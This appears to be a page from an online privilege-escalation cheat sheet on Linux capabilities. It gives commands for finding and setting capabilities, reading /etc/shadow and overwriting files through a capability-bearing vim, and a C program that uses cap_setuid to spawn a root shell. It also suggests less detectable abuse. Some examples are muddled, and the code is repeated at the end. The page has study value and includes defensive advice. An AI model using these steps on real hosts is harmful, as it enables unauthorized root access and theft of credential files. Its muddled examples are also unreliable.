10.Capabilities

Find binaries with capabilities

find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;

Set cap_net_bind_service capability (Allows binding to privileged ports)

sudo setcap cap_net_bind_service=+ep /usr/bin/my_program

Clear capabilities

sudo setcap -r /usr/bin/my_program

List capabilities of a specific file

getcap /usr/bin/my_program

Using cap_dac_override to read a normally restricted file (Dangerous, be very careful)

/usr/bin/vim.basic /etc/shadow

Using cap_dac_override to overwrite a file

echo "evil code" > /tmp/evil.sh
chmod +x /tmp/evil.sh
echo -e ':%s/original content/malicious content/\nwq!' | /usr/bin/vim.basic -es /path/to/important/file # Very dangerous

Overwriting an SUID binary

cp /bin/bash /tmp/suid_bash
chmod u+s /tmp/suid_bash
echo -e ':%s/original content/malicious content/\nwq!' | /usr/bin/vim.basic -es /tmp/suid_bash # Very dangerous

Using cap_setuid to change user ID (Requires compiled C program)

Save the following code as setuid.c:

#include <unistd.h>
#include <sys/capability.h>
#include <stdio.h>

int main() {
    cap_value_t cap_list[1];
    cap_list[0] = CAP_SETUID;
    cap_t caps = cap_get_proc();
    cap_set_flag(caps, CAP_EFFECTIVE, 1, cap_list, CAP_SET);
    cap_set_proc(caps);
    cap_free(caps);
    setuid(0); // Set UID to root
    execl("/bin/sh", "/bin/sh", NULL);
    return 0;
}

Compile and run:

gcc setuid.c -o setuid -lcap
sudo setcap cap_setuid+ep ./setuid
./setuid

Using cap_sys_admin to mount a file system

mkdir /tmp/mnt
dd if=/dev/zero of=/tmp/loopback.img bs=1M count=10
mkfs.ext4 /tmp/loopback.img
sudo setcap cap_sys_admin+ep /bin/mount
mount /tmp/loopback.img /tmp/mnt -o loop
sudo setcap cap_sys_admin+ep /bin/umount
umount /tmp/mnt

Using auditd to log capability usage

Install and configure auditd:

sudo apt install auditd # or yum install auditd, etc.
sudo systemctl enable auditd
sudo systemctl start auditd
sudo auditctl -a always,exit -F arch=b64 -S capset,setcap,getcap -k capabilities

View logs:

sudo ausearch -k capabilities -ts recent

Checking bounding sets

cat /proc/self/status | grep CapBnd

Checking effective, permitted, and inheritable sets

cat /proc/self/status | grep Cap

Checking the capabilities of a running process

sudo cat /proc/$(pidof processname)/status | grep Cap

Key Concepts:

Fine-grained Privileges: Capabilities allow for more specific control over permissions than the traditional user/group model.
Reduced Attack Surface: By granting only necessary capabilities, you limit the potential damage from compromised processes.
Vulnerabilities:
- Over-privileging: Giving processes more capabilities than they need.
- Inadequate Sandboxing: Allowing capable processes to interact with untrusted data or processes.
- Misconfiguration: Incorrectly setting or understanding capability values.
setcap Command: Used to assign capabilities to executables.
Capability Values:
- = (clear capabilities)
- +ep (effective and permitted)
- +ei (effective and inheritable)
- +p (permitted)
Dangerous Capabilities:
- cap_sys_admin: Broad administrative privileges.
- cap_setuid: Change user ID.
- cap_setgid: Change group ID.
- cap_dac_override: Bypass file permission checks.
Enumeration: find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;
Exploitation Example: Using cap_dac_override to modify /etc/passwd and gain root access.

Important Considerations and Enhancements:

Security Best Practices:
- Principle of Least Privilege: Grant only the necessary capabilities.
- Regular Audits: Review capability assignments to ensure they are still appropriate.
- Strong Sandboxing: Isolate capable processes as much as possible.
- Use of tools like auditd to log capability usage.
Capability Sets: Understand the difference between permitted, effective, inheritable, and bounding capability sets.
Bounding Set: The bounding set limits the capabilities that a process can acquire, even if they are permitted. This is a crucial security feature.
File Capabilities vs. Thread Capabilities: Understand how capabilities are applied to files and threads.
Namespaces: Combine capabilities with namespaces (e.g., user namespaces) for even stronger isolation.
Modern Distributions: Modern Linux distributions often have enhanced security features that mitigate some capability-related risks, but careful configuration is still essential.
Real World Exploits: Research real world exploits that utilize linux capabilities. This will enhance your understanding of how they can be used maliciously.
Alternative to modifying /etc/passwd: While the example given works, it is very dangerous, and easily detectable. There are many other ways of exploiting cap_dac_override that are less detectable. For example, overwriting a SUID binary.
Capabilities and containers: Capabilities are used extensively in containerization technologies like Docker and Kubernetes. Understanding them is vital for container security.

Previous3.Permissions-based Privilege Escalation Next7.-Special-permissions

Last updated 12 days ago

#include <unistd.h> #include <sys/capability.h> #include <stdio.h> int main() { cap_value_t cap_list[1]; cap_list[0] = CAP_SETUID; cap_t caps = cap_get_proc(); cap_set_flag(caps, CAP_EFFECTIVE, 1, cap_list, CAP_SET); cap_set_proc(caps); cap_free(caps); setuid(0); // Set UID to root execl("/bin/sh", "/bin/sh", NULL); return 0; }

mkdir /tmp/mnt dd if=/dev/zero of=/tmp/loopback.img bs=1M count=10 mkfs.ext4 /tmp/loopback.img sudo setcap cap_sys_admin+ep /bin/mount mount /tmp/loopback.img /tmp/mnt -o loop sudo setcap cap_sys_admin+ep /bin/umount umount /tmp/mnt